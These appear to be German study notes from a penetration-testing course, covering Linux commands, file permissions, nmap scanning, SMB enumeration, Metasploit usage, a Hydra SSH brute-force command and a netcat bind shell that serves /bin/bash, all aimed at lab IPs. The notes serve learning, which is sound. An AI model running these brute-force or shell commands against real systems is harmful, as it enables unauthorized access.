Heise Hacking Kurs LinkedIn Learning
Testumgebung:
Windows-Rechner:
IP-Adresse: 10.1.1.129
MAC-Adresse: BA-F0-EC-81-03-92
Kali-Linux:
IP-Adresse: 10.1.1.128
MAC-Adresse: FE-3A-E0-10-0E-35
Serverschutz Bausteine von BSI
Schichtenmodel TCP/IP
Infos
Generell
127.0.0.1 = localhost : Jedes Paket geht wieder zurück auf den sendenden Rechner
Wireshark
ARP = Address Resolution Protocol dient dazu MAC adressen auszulesen
Befehle:
| Befehl | Beispiel | |
| sipcalc | sipcalc 192.168.178.0/24 | Stellt die Subnetzmaske mit den IP-Adressen dar |
| ls -la | grep | ls -la | grep go | Gibt dann nur Inhalte wieder, die go enthalten |
| find | find . | Gibt alles aus |
| find . | grep | find . | grep go | Findet alles in Laufwerk und gibt aber nur inhalte mit go zurück |
| locate | Suche über die gesamte Festplatte | |
| pwd | pwd | Print Working Directory - Aktuelles laufwerk anzeigen |
| whoami | whoami | Aktueller Benutzer |
| cd | cd | Springt direkt ins homeverzeichnis |
| ps aux | Zeigt Prozesse an | |
| ps aux | grep apache2 | Zeigt alles mit apache2 an | |
| cat | Zeigt dateiinhalt an | |
| cat | cat > hackingskills cat >> hackingskills |
Erstellt eine Datei direkt |
| grep | sudo cat /etc/config-datei | grep output |
Sucht nach dem String Output |
| nl |
zeigt den inhalt einer datei mit den Zeilennummern an. Kann auch mit grep verbunden werden |
|
| sed |
|
Linux Hilfe
| aircrack-ng | aircrack-ng --help | more |
Zeigt die HIlfe an mit jeder seite q für Beenden |
| man aircrack-ng | Zeigt das Manual an |
Finden in Linux
locate - locate apache2.conf zeit an wo dateien liegen. (Datenbank aktualisieren: updatedb)whereis - whereis nmapwhich - which nmapfind - find / -type f -name apache2 Zeigt f = Dateien an die im / Homeverzeichnis liegen. Mit sudo werden alle dateien gefunden. find - find /etc -tpye -f -name apache2.* findet alles in etc mit dem Namen apache2
Berechtigungen
-rw-r--r-- 1 dapelza dapelza 0 31. Jan 10:19 test.txt
Berechtigung User Gruppe Größe Datum Dateiname
3 Bits Besitzer 3 Bits Gruppe 3 Bits alle anderen
| Bit | Berechtigung | |
| r | Read | |
| w | Write | |
| x | Execute (Ausführen) | |
| Berechtigung ändern | ||
| chmod +x test.txt | Alle dürfen ausführen | |
| chmod -x test.txt | Berechtiung nehmen | |
| chmod u+x test.txt | Nur der User darf die Datei ausführen | |
| chmod g+x test.txt | Gruppe darf ausführen |
Phasen des Hacking
Passives Scannen
hunter.io
Email-Adressen von Unternehmen herausfinden
Burp Suite
Zum Auslesen von Http Code über einen Proxy
DefaultCreds-cheat-sheet
Webseiten überprüfen
Aktives Scannen
Nmap
| Parameter | Kommentar |
| nmap -sn 10.1.1.0/24 |
Pingt einen ip-Bereich und gibt die Teilnehmer wieder. |
| nmap 10.1.1.136 -v | Vorher schon ergebnisse Anzeigen |
| nmap 10.1.1.136 -oN /pfad/zur/datei | speichert die ergebnisse in einer Datei ab |
| nmap 10.1.1.136 -p40,21 | können bestimmte Ports gescannt werden |
| nmap 10.1.1.136 -sU | Scannta auch udap |
| nmap 10.1.1.136 -A | Führt scripte aus |
Dirbuster
Scannt nach unterverzeichnisen auf einer Domain
Im internet nach Exploits suchen
Beispiel: exploitdb Wordpress 4.9
searchsploit
findet schwachstellen in einer Software
smbmap
findet schwachstellen in der SMB freigabe
smbmap -u '' -H 10.0.2.9
-u '' = User aber nicht angeben.
Enum4Linux
findet usernamen
enum4linux 10.1.1.150 -U
Hydra
Brutforce auf ssh oder smb
hydra -l jan -P /usr/share/wordlist/rockyou.txt ssh://10.1.1.12 -t 4
Exploit-Datenbanken
www.exploit-db.com
www.cvedetails.com
Exploits
Metasploit framework
msfconsole
Bevor man mit msf los legt:
Datenbank starten
sudo msfdb init
Postgressql dienst starten
sudo systemctl start postgresql
Metasploit verwenden
search proftp
use exploit/windwos/ftp/proftp_banner
oder
use 4
danach:
options
set Rhosts
show payloads
show targets
Netcat
Opfer
nc -lvp 4444 - Damit kann man generell auf eine Verbindung lauschen
nc -lvp 4444 -e /bin/bash - Würde bei Verbindung eine Shell starten
Angreifer
nc 10.1.1.138 4444 - Stellt eine Verbindung zum lauschenden Opfer auf dem Port 4444 her
Pentest MOnkey reverse shell
Tools
SED
Suchen und ersetzen

